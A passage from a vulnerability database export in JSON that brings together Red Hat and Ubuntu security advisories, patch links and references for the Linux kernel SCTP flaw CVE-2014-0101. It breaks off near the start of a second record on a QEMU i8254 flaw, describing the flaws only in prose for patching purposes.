6.32-279.43.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-279.43.1.el6.s390x.rpm\nperf-2.6.32-279.43.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debug-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-devel-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-headers-2.6.32-279.43.1.el6.x86_64.rpm\nperf-2.6.32-279.43.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.3):\n\nSource:\nkernel-2.6.32-279.43.1.el6.src.rpm\n\ni386:\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-279.43.1.el6.i686.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.i686.rpm\npython-perf-2.6.32-279.43.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-279.43.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm\npython-perf-2.6.32-279.43.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-279.43.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\npython-perf-2.6.32-279.43.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-279.43.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\npython-perf-2.6.32-279.43.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-279.43.1.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2014-0101.html\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFTVqvnXlSAg2UNWIIRAskwAKDFhD3zS1sh/vhrk31MzjZjFuD8kwCfdeRV\n1nSgXH01tADV2vYadphGfKs=\n=2Sa7\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. ============================================================================\nUbuntu Security Notice USN-2225-1\nMay 27, 2014\n\nlinux-lts-saucy vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux-lts-saucy: Linux hardware enablement kernel from Saucy\n\nDetails:\n\nMatthew Daley reported an information leak in the floppy disk driver of the\nLinux kernel. An unprivileged local user could exploit this flaw to obtain\npotentially sensitive information from kernel memory. (CVE-2014-1738)\n\nMatthew Daley reported a flaw in the handling of ioctl commands by the\nfloppy disk driver in the Linux kernel. An unprivileged local user could\nexploit this flaw to gain administrative privileges if the floppy disk\nmodule is loaded. (CVE-2014-0055)\n\nA flaw was discovered in the handling of network packets when mergeable\nbuffers are disabled for virtual machines in the Linux kernel. Guest OS\nusers may exploit this flaw to cause a denial of service (host OS crash) or\npossibly gain privilege on the host OS. (CVE-2014-0077)\n\nNikolay Aleksandrov discovered a race condition in Linux kernel\u0027s IPv4\nfragment handling code. \n(CVE-2014-0100)\n\nA flaw was discovered in the Linux kernel\u0027s handling of the SCTP handshake. (CVE-2014-0101)\n\nA flaw was discovered in the handling of routing information in Linux\nkernel\u0027s IPv6 stack. A remote attacker could exploit this flaw to cause a\ndenial of service (memory consumption) via a flood of ICMPv6 router\nadvertisement packets. (CVE-2014-2309)\n\nAn error was discovered in the Linux kernel\u0027s DCCP protocol support. A\nremote attacked could exploit this flaw to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2014-2523)\n\nMax Sydorenko discovered a race condition in the Atheros 9k wireless driver\nin the Linux kernel. (CVE-2014-2672)\n\nAdhemerval Zanella Neto discovered a flaw the in the Transactional Memory\n(TM) implementation for powerpc based machine. \n(CVE-2014-2673)\n\nAn error was discovered in the Reliable Datagram Sockets (RDS) protocol\nstack in the Linux kernel. \n(CVE-2014-2678)\n\nYaara Rozenblum discovered a race condition in the Linux kernel\u0027s Generic\nIEEE 802.11 Networking Stack (mac80211). (CVE-2014-2706)\n\nA flaw was discovered in the Linux kernel\u0027s ping sockets. An unprivileged\nlocal user could exploit this flaw to cause a denial of service (system\ncrash) or possibly gain privileges via a crafted application. \n(CVE-2014-2851)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n  linux-image-3.11.0-22-generic   3.11.0-22.38~precise1\n  linux-image-3.11.0-22-generic-lpae  3.11.0-22.38~precise1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-0101"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "db": "BID",
        "id": "65943"
      },
      {
        "db": "VULHUB",
        "id": "VHN-67594"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-0101"
      },
      {
        "db": "PACKETSTORM",
        "id": "126343"
      },
      {
        "db": "PACKETSTORM",
        "id": "126800"
      },
      {
        "db": "PACKETSTORM",
        "id": "126795"
      },
      {
        "db": "PACKETSTORM",
        "id": "126793"
      },
      {
        "db": "PACKETSTORM",
        "id": "126255"
      },
      {
        "db": "PACKETSTORM",
        "id": "126798"
      },
      {
        "db": "PACKETSTORM",
        "id": "126346"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-67594",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67594"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-0101",
        "trust": 3.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/03/04/6",
        "trust": 2.6
      },
      {
        "db": "BID",
        "id": "65943",
        "trust": 2.1
      },
      {
        "db": "SECUNIA",
        "id": "59216",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "126346",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "126255",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "126343",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "126295",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126729",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-67594",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-0101",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126800",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126795",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126793",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "126798",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67594"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-0101"
      },
      {
        "db": "BID",
        "id": "65943"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "db": "PACKETSTORM",
        "id": "126343"
      },
      {
        "db": "PACKETSTORM",
        "id": "126800"
      },
      {
        "db": "PACKETSTORM",
        "id": "126795"
      },
      {
        "db": "PACKETSTORM",
        "id": "126793"
      },
      {
        "db": "PACKETSTORM",
        "id": "126255"
      },
      {
        "db": "PACKETSTORM",
        "id": "126798"
      },
      {
        "db": "PACKETSTORM",
        "id": "126346"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "id": "VAR-201403-0508",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67594"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T21:52:28.560000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "net: sctp: fix sctp_sf_do_5_1D_ce to verify if we/peer is AUTH capable",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/ec0223ec48a90cb605244b45f7c62de856403729"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "net: sctp: fix sctp_sf_do_5_1D_ce to verify if we/peer is AUTH capable",
        "trust": 0.8,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ec0223ec48a90cb605244b45f7c62de856403729"
      },
      {
        "title": "Bug 1070705",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1070705"
      },
      {
        "title": "RHSA-2014:0328",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0328.html"
      },
      {
        "title": "fba54a407bb2b7c2aae62ac2d03df806bc1a794a",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=48590"
      },
      {
        "title": "11dac21e658690cdf01d7eb41c7e653d142ad9d4",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=48589"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2173-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-ec2 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2174-1"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2014-317",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-317"
      },
      {
        "title": "Red Hat: CVE-2014-0101",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-0101"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-quantal vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2223-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2228-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2221-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-raring vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2224-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-ti-omap4 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2227-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-saucy vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2225-1"
      },
      {
        "title": "DRA_writeup",
        "trust": 0.1,
        "url": "https://github.com/kpn-ciso/dra_writeup "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2014-0101"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-476",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67594"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/03/04/6"
      },
      {
        "trust": 2.1,
        "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15317.html"
      },
      {
        "trust": 2.1,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1070705"
      },
      {
        "trust": 1.9,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0419.html"
      },
      {
        "trust": 1.9,
        "url": "http://www.ubuntu.com/usn/usn-2173-1"
      },
      {
        "trust": 1.9,
        "url": "http://www.ubuntu.com/usn/usn-2174-1"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/59216"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/65943"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0328.html"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2014-0432.html"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/torvalds/linux/commit/ec0223ec48a90cb605244b45f7c62de856403729"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=ec0223ec48a90cb605244b45f7c62de856403729"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0101"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-0101"
      },
      {
        "trust": 0.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=ec0223ec48a90cb605244b45f7c62de856403729"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0101"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2523"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2014:0419"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2014-0101"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2014:0432"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2014:0520"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2014:0328"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2706"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2851"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1738"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2309"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2678"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2672"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1737"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0077"
      },
      {
        "trust": 0.3,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=bbd0d59809f9"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://patchwork.ozlabs.org/patch/325898/"
      },
      {
        "trust": 0.3,
        "url": "https://downloads.avaya.com/css/p8/documents/100180030"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0069"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4483"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0055"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/476.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-alas-2014-317"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2173-1/"
      },
      {
        "trust": 0.1,
        "url": "https://www.rapid7.com/db/vulnerabilities/linuxrpm-rhsa-2014-0432"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/2.6.32-58.120"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ti-omap4/3.2.0-1446.65"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2227-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0196"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3122"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-raring/3.8.0-41.60~precise1"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2224-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.2.0-63.95"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2221-1"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/site/articles/11258"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0101.html"
      },
      {
        "trust": 0.1,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-saucy/3.11.0-22.38~precise1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2673"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2225-1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0100"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ec2/2.6.32-363.76"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-67594"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-0101"
      },
      {
        "db": "BID",
        "id": "65943"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "db": "PACKETSTORM",
        "id": "126343"
      },
      {
        "db": "PACKETSTORM",
        "id": "126800"
      },
      {
        "db": "PACKETSTORM",
        "id": "126795"
      },
      {
        "db": "PACKETSTORM",
        "id": "126793"
      },
      {
        "db": "PACKETSTORM",
        "id": "126255"
      },
      {
        "db": "PACKETSTORM",
        "id": "126798"
      },
      {
        "db": "PACKETSTORM",
        "id": "126346"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-67594"
      },
      {
        "db": "VULMON",
        "id": "CVE-2014-0101"
      },
      {
        "db": "BID",
        "id": "65943"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "db": "PACKETSTORM",
        "id": "126343"
      },
      {
        "db": "PACKETSTORM",
        "id": "126800"
      },
      {
        "db": "PACKETSTORM",
        "id": "126795"
      },
      {
        "db": "PACKETSTORM",
        "id": "126793"
      },
      {
        "db": "PACKETSTORM",
        "id": "126255"
      },
      {
        "db": "PACKETSTORM",
        "id": "126798"
      },
      {
        "db": "PACKETSTORM",
        "id": "126346"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-03-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67594"
      },
      {
        "date": "2014-03-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-0101"
      },
      {
        "date": "2014-02-27T00:00:00",
        "db": "BID",
        "id": "65943"
      },
      {
        "date": "2014-03-12T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "date": "2014-04-26T18:57:25",
        "db": "PACKETSTORM",
        "id": "126343"
      },
      {
        "date": "2014-05-27T16:02:18",
        "db": "PACKETSTORM",
        "id": "126800"
      },
      {
        "date": "2014-05-27T16:00:50",
        "db": "PACKETSTORM",
        "id": "126795"
      },
      {
        "date": "2014-05-27T16:00:19",
        "db": "PACKETSTORM",
        "id": "126793"
      },
      {
        "date": "2014-04-22T23:41:05",
        "db": "PACKETSTORM",
        "id": "126255"
      },
      {
        "date": "2014-05-27T16:02:06",
        "db": "PACKETSTORM",
        "id": "126798"
      },
      {
        "date": "2014-04-26T18:57:45",
        "db": "PACKETSTORM",
        "id": "126346"
      },
      {
        "date": "2014-03-13T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      },
      {
        "date": "2014-03-11T13:01:06.733000",
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-67594"
      },
      {
        "date": "2020-08-25T00:00:00",
        "db": "VULMON",
        "id": "CVE-2014-0101"
      },
      {
        "date": "2015-04-13T20:26:00",
        "db": "BID",
        "id": "65943"
      },
      {
        "date": "2014-04-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      },
      {
        "date": "2023-04-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      },
      {
        "date": "2023-02-13T00:32:28.940000",
        "db": "NVD",
        "id": "CVE-2014-0101"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "126343"
      },
      {
        "db": "PACKETSTORM",
        "id": "126255"
      },
      {
        "db": "PACKETSTORM",
        "id": "126346"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  net/sctp/sm_statefuns.c Inside  sctp_sf_do_5_1D_ce Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-001608"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "code problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201403-197"
      }
    ],
    "trust": 0.6
  }
}

var-201508-0166
Vulnerability from variot

The pit_ioport_read in i8254.c in the Linux kernel before 2.6.33 and QEMU before 2.3.1 does not distinguish between read lengths and write lengths, which might allow guest OS users to execute arbitrary code on the host OS by triggering use of an invalid index. QEMU is prone to a memory-corruption vulnerability because it fails to perform adequate boundary-checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code on the host with the privileges of the hosting QEMU process. Failed exploit attempts may result in a denial-of-service condition. The Linux kernel is the kernel used by the open source operating system Linux released by the American Linux Foundation. The NFSv4 implementation is one of the distributed file system protocols. QEMU (also known as Quick Emulator) is a set of analog processor software developed by French programmer Fabrice Bellard. The software has the characteristics of fast speed and cross-platform. There is a security vulnerability in the 'pit_ioport_read' function in the i8254.c file of Linux kernel 2.6.32 and earlier versions and QEMU 2.3.0 and earlier versions. The vulnerability is due to the fact that the program does not distinguish between read length and write length. Relevant releases/architectures:

RHEV-H and VDSM for 7 Hosts - x86_64

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: qemu-kvm security and bug fix update Advisory ID: RHSA-2015:1507-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1507.html Issue date: 2015-07-27 CVE Names: CVE-2015-3214 CVE-2015-5154 =====================================================================

  1. Summary:

Updated qemu-kvm packages that fix two security issues and one bug are now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

  1. Description:

KVM (Kernel-based Virtual Machine) is a full virtualization solution for Linux on AMD64 and Intel 64 systems. The qemu-kvm package provides the user-space component for running virtual machines using KVM.

